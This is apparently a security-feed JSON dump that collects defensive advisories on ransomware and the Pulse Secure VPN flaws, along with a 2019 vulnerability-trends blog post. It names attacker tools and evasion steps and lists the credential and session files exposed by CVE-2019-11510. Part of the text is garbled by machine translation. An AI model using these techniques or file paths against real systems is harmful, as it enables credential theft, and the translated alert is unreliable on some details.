credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "modified": "2020-04-28T16:00:49", "published": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-08-27T08:41:40", "bulletinFamily": "info", "cvelist": ["CVE-2019-11538", "CVE-2019-11508", "CVE-2019-11542", "CVE-2019-11540", "CVE-2019-11510", "CVE-2019-11539"], "description": "360CERT detected related to security researcher published the Pulse Secure SSL VPN multiple vulnerabilities. Attacks that can exploit the vulnerability to read arbitrary files, including plaintext passwords, account information and Session information, as well as into the background after the implementation of system commands. \n\n0x01 vulnerability details \nVulnerability ID: \nCVE-2019-11510 \u2013 unauthorized arbitrary file read vulnerability \nCVE-2019-11542 \u2013 after the authorization stack buffer overflow vulnerability \nCVE-2019-11539 \u2013 after the grant command injection vulnerability \nCVE-2019-11538 \u2013 authorized to arbitrarily file read vulnerability \nCVE-2019-11508 \u2013 authorized to arbitrarily file write vulnerability \nCVE-2019-11540 \u2013 after the authorization session hijacking vulnerability \nVulnerability impact: \nCVE-2019-11510: in the case of authorization can read the system any files \nthe /etc/passwd \nthe /etc/hosts \n/data/runtime/mtmp/system \n/data/runtime/mtmp/lmdb/dataa/data. mdb \n/data/runtime/mtmp/lmdb/dataa/lock. mdb \n/data/runtime/mtmp/lmdb/randomVal/data. mdb \n/data/runtime/mtmp/lmdb/randomVal/lock. mdb \nVpn user and password hash is stored mtmp/system, dataa/data. the mdb stores the user login after the cache of the plaintext password, randomVal/data. the mdb stores user Session. An attacker could exploit this vulnerability to obtain account and password login background. \nCVE-2019-11539: background a command injection vulnerability, in the use of on the step into the background after can be combined with this hole to perform system commands. \n! [](/Article/UploadPic/2019-8/201982711131470. png) \n(Note: the picture cut to the Orange Tsai BlackHat PPT) note: some exploit script has been in the online public, does not exclude that there are already hackers began exploiting the vulnerability to attack. \n\n0x02 impact version \nVulnerability number \nImpact version \nCVE-2019-11510 \nPulse Connect Secure: 9.0 RX 8.3 RX 8.2 RX \nCVE-2019-11542 \nPulse Connect Secure: 9.0 RX 8.3 RX 8.2 RX 8.1 RX and Pulse Policy Secure: 9.0 RX 5.4 RX 5.3 RX 5.2 RX 5.1 RX \nCVE-2019-11539 \nPulse Connect Secure: 9.0 RX 8.3 RX 8.2 RX 8.1 RX and Pulse Policy Secure: 9.0 RX 5.4 RX 5.3 RX 5.2 RX 5.1 RX \nCVE-2019-11538 \nPulse Connect Secure: 9.0 RX 8.3 RX 8.2 RX 8.1 RX \nCVE-2019-11508 \nPulse Connect Secure: 9.0 RX 8.3 RX 8.2 RX 8.1 RX \nCVE-2019-11540 \nPulse Connect Secure: 9.0 RX 8.3 RX and Pulse Policy Secure: 9.0 RX 5.4 RX \n\n0x03 repair recommendations \nAuthorities have released the fix version: https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/ \n\n0x04 timeline \n2019-08-10 section vulnerability details disclosed \n2019-08-21 part of the exploit script open \n2019-08-26 360CERT warning \n\n0x05 reference links \nhttps://hackerone.com/reports/591295 \nhttps://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa-pre-auth-rce-on-leading-ssl-vpns-15545 \n\n", "edition": 1, "modified": "2019-08-27T00:00:00", "published": "2019-08-27T00:00:00", "id": "MYHACK58:62201995674", "href": "http://www.myhack58.com/Article/html/3/62/2019/95674.htm", "title": "Pulse Secure SSL VPN vulnerability alerts-a vulnerability alert-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2020-01-23T09:35:38", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708", "CVE-2019-1040", "CVE-2019-11043", "CVE-2019-11510", "CVE-2019-11931", "CVE-2019-11932", "CVE-2019-14287", "CVE-2019-2107", "CVE-2019-2215", "CVE-2019-8777"], "description": "As a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrating it into a single repository, and assessing each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide an analysis of all web applications and database vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did last year, we took a look back at 2019 to understand the changes and trends in web application and database security over the past year.\n\nThis year we slightly changed the vulnerability classification algorithm. The goal was to increase classification accuracy as well as to fit the vulnerabilities to the categories defined by OWASP in the best way possible. Such changes directly affected our research, however, and made it hard to compare to the [previous years\u2019](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/>) published results. We, therefore, executed a new algorithm on the data from the previous years and conducted the research back to 2016. In this blog post, all the results from 2019 and previous years are aligned based on the new classification algorithm.\n\nIt may seem to our readers that, when divided into categories, the sum of the vulnerabilities is greater than the total number of vulnerabilities. The reason for this is the assignment of particular vulnerabilities to multiple categories. For example, we came across a SQL injection vulnerability that could allow an attacker to extract sensitive information from a database and execute arbitrary scripts. In such a case the vulnerability would be related to both \u2018Injection\u2019 and \u2018Sensitive Data Exposure\u2019 categories.\n\nWe often face a situation in which one vulnerability can be exploited in different ways and lead to different results. In such cases, we decided to assign this vulnerability to all the categories in which it may manifest. We believe that such an approach will present the overall picture in the most accurate way.\n\nAs in previous years, we continued to see an increase in the amount of vulnerabilities in 2019. The dominant category this year was, by far, injection. When drilling down into the data, a large percentage appeared to be related to Remote Code/Command Execution (RCE). The runner up category was Cross-site scripting (XSS), mainly consisting of Reflected XSS vulnerabilities. We also observed an increase in vulnerabilities in third-party components compared to the previous year, with most of the vulnerabilities related to WordPress plugins. We observed an unexpected decrease in the number of IoT vulnerabilities too, despite the increase in the number of devices in the market.\n\nAs expected, the number of vulnerabilities in API (Application Programming Interface), which is still a growing market, continues to grow, although not as fast as we would have expected based on the previous year. In the content management system category, WordPress was not only the most popular platform but also dominated the number of new vulnerabilities in 2019. In the server-side technologies category, PHP - the most prevalent server-side language - was associated with the highest number of vulnerabilities. MySQL appears to be ahead of all others popular databases, in terms of new vulnerabilities discovered in the last year, with 130 (59%) of the total vulnerabilities. The most common vulnerability in databases was Denial-of-Service (DoS). We drew an interesting conclusion from the social media analysis we conducted on twitter.com. The analysis revealed that the [CVSS score](<https://nvd.nist.gov/vuln-metrics/cvss>), which most of the industry relies on in order to prioritize systems patching, doesn\u2019t necessarily correlate with the vulnerability popularity (at least in social media).\n\n## 2019 vulnerabilities statistics\n\nThe first phase in our yearly analysis was to check the number of vulnerabilities published in 2019 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last four years. We can see that the overall number of new vulnerabilities in 2019 (20,362) increased by 17.6% compared to 2018 (17,308) and by 44.5% compared to 2017 (14,086). Dividing vulnerabilities according to the [CVSS](<https://nvd.nist.gov/vuln-metrics/cvss>) (Common Vulnerability Scoring System), 8% were ranked as Low or None severity, 61% were considered Medium, while 18% and 13% were of High and Critical severity respectively. According to our data, almost half of vulnerabilities (47%) have a public exploit available to hackers. In addition, more than a third (40.2%) of vulnerabilities don\u2019t have an available solution, such as a software upgrade, workaround, or software patch.\n\nFigure 1: Number of vulnerabilities\n\n## Vulnerabilities by OWASP category\n\nIn Figure 2, you can see vulnerabilities from 2019 split into OWASP top 10 2017 categories.\n\nFigure 2: Vulnerabilities into OWASP categories\n\n## Most common vulnerability - injection\n\nThe dominant category this year was, by far, injection, with 5,730 (28.1%) of the total vulnerabilities seen in 2019 - a 21% increase on last year. When talking about injection vulnerabilities, the first thing that jumps to mind is SQL injection. When drilling down into the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 3,869 vulnerabilities (19%), compared to 1,610 vulnerabilities (8%) for SQLi. This was alongside 75 vulnerabilities related to local or remote file inclusion, and 607 vulnerabilities to unsanitized file upload.\n\n## Increase in the number of vulnerabilities in third-party components\n\nWe observed an increase of 80.6% in vulnerabilities in third-party components in 2019 compared to the previous year. These components contain plugins and packages for major products developed by third parties. Out of 2,081 vulnerabilities, 1,341 (64%) were in WordPress plugins, 354 (17%) in Jenkins plugins, while 88 new vulnerabilities were in NodeJS packages and the rest split among different products and frameworks.\n\n## DoS and CSRF\n\nTwo major vulnerability categories - Denial-of-Service (DoS) and Cross-Site-Request-Forgery (CSRF) - were out of the OWASP top 10, but still very common. In 2019 we observed 4,130 new DoS vulnerabilities, a decrease of 19.2% on 2018 with 5114 vulnerabilities. Conversely, the number of CSRF vulnerabilities increased by 23.8% from 639 in 2018 to 791 in 2019.\n\nFigure 3: DoS and CSRF vulnerabilities\n\n## An unexpected decrease in IoT vulnerabilities\n\nDespite the increase in the number of IoT (Internet of Things) devices and vendors, we observed a decrease of 9% in vulnerabilities on the previous year. Figure 4 shows the number of IoT vulnerabilities between 2016-2019.\n\nDiving into categories we found that DoS was the most common vulnerability for IoT in 2019 with 418 vulnerabilities. The runner up was Remote Code/Command Execution with 398 vulnerabilities, and Broken Authentication (default credentials) was in third place with 157 new vulnerabilities in 2019. From here we can conclude that manufacturers had learned from old mistakes and paid more attention to IoT security.\n\nFigure 4: IoT vulnerabilities\n\n## API vulnerabilities - growing, but slowing\n\nAPI (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. In accordance with this, as presented in Figure 5, the number of new API vulnerabilities in 2019 (485) increased by 18.9% from 2018. Although API vulnerabilities continued to grow year-over-year, they appear to be slowing - from ~80% yearly growth between 2016 to 2018. One possible explanation is that, since APIs are more popular nowadays, they draw more attention from hackers and security researchers. In turn, organizations spend more time securing their APIs.\n\nFigure 5: API vulnerabilities\n\n## Content management systems\n\nThe most popular content management system is WordPress which, according to market share statistics cited by [BuiltWith](<https://trends.builtwith.com/cms>), is used by over 33% of all websites, and by 68% of all websites using a known content management system, followed by Drupal and Joomla. Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (1,574) last year and also saw a major increase of 143% from 2018 (Figure 6). The second major increase in the number of vulnerabilities (77%) was in Magento, from 126 in 2018 to 223 in 2019.\n\nFigure 6: Content Management Systems vulnerabilities\n\nAccording to the [WordPress official site](<https://wordpress.org/plugins/>), the current number of plugins is 55,173, a slight decrease from 55,271 in 2018. Despite this slower growth in new plugins, the number of WordPress vulnerabilities increased. The explanation for this could either be the code quality of the plugins, or the fact that WordPress is such a popular CMS, motivating more attackers to develop dedicated attack tools and try their luck searching for holes in the code.\n\nUnsurprisingly, 97.2% of WordPress vulnerabilities were related to plugins (see Figure 7), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it \u2014 WordPress is open-source, easy to manage, and there is no enforcement or proper process that mandates minimum security standards (e.g. code analysis). Hence, WordPress plugins are especially prone to vulnerabilities.\n\nFigure 7: WordPress vulnerabilities\n\nThe number of vulnerabilities in WordPress plugins increased by 143% from 629 in 2018 to 1,530 in 2019. The remaining 44 vulnerabilities were related to WordPress core, which also increased by 159% compared to 2018 where there were only 17 vulnerabilities.\n\nThe most common WordPress vulnerability by far was XSS with 703 (44.6%) vulnerabilities, while the runner up was CSRF with 254 (16.1%) vulnerabilities this year. In 2018, this position was held by Remote Code Execution.\n\nFigure 8: WordPress vulnerabilities into attack type\n\n## Server technologies\n\nPHP is still the most prevalent server-side language used by [37% of the websites](<https://trends.builtwith.com/framework>). Therefore it\u2019s expected to be associated with the highest number of vulnerabilities. In 2019, 2,652 vulnerabilities in server technologies implemented in PHP were published (see Figure 9), an increase of 12.7% on the number of vulnerabilities in 2018 (2,353). Java language, on which many Apache services are written (HTTP-Server, Tomcat, Struts, etc.) had much less attention this year, with 229 new vulnerabilities compared to 256 in 2018. This year also had far fewer (62.5%) vulnerabilities in applications or packages written in JavaScript for NodeJS. These trends can be explained by a continuous increase of awareness of the developers to the application\u2019s security.\n\nFigure 9: Top Server-Side technology vulnerabilities\n\n## Databases\n\n[The three most popular databases](<https://db-engines.com/en/ranking>), with only small gaps between them, were Oracle, MySQL, and Microsoft SQL Server. But, in terms of new vulnerabilities discovered in the last year, MySQL was ahead of all others, with 130 (59%) of the vulnerabilities - this represented an increase of 23.8% on 2018 and 68.8% on 2017. The runner up with regard to the number of new vulnerabilities was SQLite, with 17, followed by Oracle with 16. The popularity of SQLite is growing as it is a lightweight database that\u2019s [integrated](<https://www.sqlite.org/famous.html>) into Android, iOS and Windows 10 as well as being used in many well-known applications like Chrome and Firefox. The most common vulnerability in Databases was Denial-of-Service (DoS) with 138 vulnerabilities, and the runner up was Broken Access Control with 45. This is due to the fact that, in the case of databases, the attacker\u2019s desire is to get access to data. That said, vulnerabilities such as XXE, XSS or CSRF aren\u2019t just applicable to databases.\n\nFigure 10: Vulnerabilities in DataBases\n\n## Social media analysis\n\nAnalyzing tweets from twitter.com, we located the top viral vulnerabilities from 2019. The first place with a wide margin - ~4.5K posts and ~77.5K retweets - belonged to (CVE-2019-0708), a remote code execution vulnerability in Remote Desktop Services for Windows (a.k.a BlueKeep). That was disclosed on May 16 and had a public exploit from September 6. According to [StatCounter Global Stats reports](<https://gs.statcounter.com/os-market-share/desktop/worldwide>) from December 2019, Windows is the most popular desktop computer operating system with more than 77% market share, which might explain the hype around this vulnerability.\n\nThe runner up, with 670 posts and 18.7K retweets, was (CVE-2019-14287) - a bypass of `runas` user restrictions in UNIX sudo shell command. By exploiting this vulnerability, users with low privileges can run processes as a root user. The third place, with 339 posts and ~15K retweets, belonged to (CVE-2019-11932), a remote code execution in WhatsApp Messenger for Android in which the android-gif-drawable library is used to parse a specially crafted GIF image. According to [Statista](<https://www.statista.com/statistics/258749/most-popular-global-mobile-messenger-apps/>), WhatsApp appears to be a market leader in its sector with 1.6 billion active users.\n\nThe most viral vulnerability in web application technologies, with 553 unique posts and ~8.5K retweets, was (CVE-2019-11043), a [remote code execution vulnerability in PHP-FPM](<https://www.imperva.com/blog/tracking-cve-2019-11043-php-vulnerability/>) running on the Nginx server. It wasn\u2019t surprising that the RCE vulnerability in the most popular server-side technology would be highlighted accordingly in social media. Between the exploit\u2019s release on October 22 and the end of the year, we observed more than 730,000 attempted attacks on Imperva\u2019s Cloud WAF customers.\n\n**CVE ID** | **DESCRIPTION** | **CVSS SCORE** | **DATE PUBLISHED** \n---|---|---|--- \nCVE-2019-0708 | Microsoft Windows Remote Desktop Services RDP Connection Request Handling Remote Code Execution | 10 | 16/05/2019 \nCVE-2019-14287 | Sudo Runas Specification ALL Keyword Local Command Execution | 8.8 | 14/10/2019 \nCVE-2019-11932 | WhatsApp Messenger for Android GIF Image Handling Function Arbitrary Code Execution | 8.8 | 02/10/2019 \nCVE-2019-1040 | Microsoft Windows MitM NTLM MIC Protection Bypass | 5.9 | 12/06/2019 \nCVE-2019-11043 | Remote Code Execution Vulnerability In PHP-FPM (The Fastcgi Process Manager) Running On The Nginx Server | 9.8 | 28/10/2019 \nCVE-2019-11931 | WhatsApp MP4 File Elementary Stream Metadata Handling Remote Stack Buffer Overflow | 7.8 | 14/11/2019 \nCVE-2019-2215 | Linux Kernel Binder (The Main Inter-Process Communication System In Android) Use-after-free Local Privilege Escalation | 7.8 | 11/10/2019 \nCVE-2019-8777 | Apple macOS FaceTime Lock Screen Handling Unspecified Local Contact Information Disclosure | 1.2 | 10/10/2019 \nCVE-2019-11510 | Pulse Connect Secure Web Service HTML5 Access Feature Path Traversal Remote File Disclosure | 10 | 26/04/2019 \nCVE-2019-2107 | Google Android Media Framework Unspecified File Handling Arbitrary Code Execution | 8.8 | 01/07/2019 \n \nThe interesting conclusion we drew from the analysis of these tweets was that the [CVSS score](<https://nvd.nist.gov/vuln-metrics/cvss>) that most of the industry relies on to prioritize systems patching doesn\u2019t necessarily correlate with the vulnerability popularity (at least in social media). While 95% of vulnerabilities are mentioned in fewer than 40 tweets, there are some \u201csuperstars\u201d that feature in thousands of posts and reposts. In Figure 12 you can see the distribution of vulnerabilities by CVSS score and their virality in social media. While it\u2019s not hard to notice a trend for more viral vulnerabilities among high CVSS scores, there are dozens of vulnerabilities in the Medium severity range that also reached high popularity in social media.\n\nFigure 12: CVSS by Social Media Virality\n\n## Predictions for 2020\n\nAs a security vendor, we\u2019re often asked for our thoughts on what the future might hold. Here, then, are our vulnerability predictions for 2020:\n\n * Old faithful Injection and Cross-Site-Scripting vulnerabilities will remain at the top of the chart. Despite the awareness of these vulnerabilities and the number of tools that check code for their presence, their number won\u2019t decrease in 2020. The reason for this is the direct impact of the exploitation of these vulnerabilities, as well as - in most cases - the lack of preconditions required to exploit them.\n * The number of vulnerabilities in third-parties will continue to grow. Major platforms and frameworks rely on third-party plugins. WordPress has over [55K plugins](<https://wordpress.org/plugins/>), the NPM registry has almost [450K packages](<https://skimdb.npmjs.com/registry>) for NodeJS, and PyPI has over [210K packages](<https://pypi.org/>) for Python. In addition, there are also main package registries for [Java](<https://maven.apache.org/>) and [Ruby](<https://rubygems.org/>)-based projects. As the community continues to grow, and without code standards or restrictions to publish a plugin or a package, they remain the weakest point in the application, making them the sweet spot for attackers.\n * The release of the [OWASP top 10 for API](<https://www.owasp.org/index.php/OWASP_API_Security_Project>) that standardizes the main threats in API will, on one hand, increase the awareness of security among developers. On the other hand, however, it will focus attackers and increase their attention on API vulnerabilities. Based on the previous year\u2019s results, we expect to see constant growth, but at the same time a decrease in the growth rate.\n * The security awareness among IoT vendors is still growing, so they will invest more in securing their devices. This will be reflected in the number of new vulnerabilities in IoT devices.\n\n## How to protect your apps and data\n\nOne of the best solutions for protecting against web application and database vulnerabilities is to deploy a [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Data Monitoring & Protection. The solutions may be either on-premise, in the cloud, or a combination of both depending on your needs, infrastructure, and more. As organizations move more of their apps and data to the cloud, it\u2019s important to think through your security requirements. A solution supported by a dedicated security team is one to add to your selection criteria. Security teams can push timely security updates in order to properly defend your assets.\n\nThe post [The State of Vulnerabilities in 2019](<https://www.imperva.com/blog/the-state-of-vulnerabilities-in-2019/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2020-01-23T08:56:58", "published": "2020-01-23T08:56:58", "id": "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51", "href": "https://www.imperva.com/blog/the-state-of-vulnerabilities-in-2019/", "type": "impervablog", "title": "The State of Vulnerabilities in 2019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:42", "bulletinFamily": "info", "cvelist": ["CVE-2019-11507", "CVE-2019-11508", "CVE-2019-11509", "CVE-2019-11510", "CVE-2019-11538", "CVE-2019-11539", "CVE-2019-11540", "CVE-2019-11541", "CVE-2019-11542", "CVE-2019-11543"], "description": "### Overview \n\nPulse Secure SSL VPN contains multiple vulnerabilities that can allow remote unauthenticated remote attacker to compromise the VPN server and connected clients.\n\n### Description \n\nPulse Secure released an out-of-cycle [advisory](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) along with software patches for the various affected products on April 24, 2019. This addressed a number of vulnerabilities including a Remote Code Execution (RCE) vulnerability with pre-authentication access. This vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates. The [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) has a CVSS score of 10. \n\nThe CVEs listed in the advisory are: \n 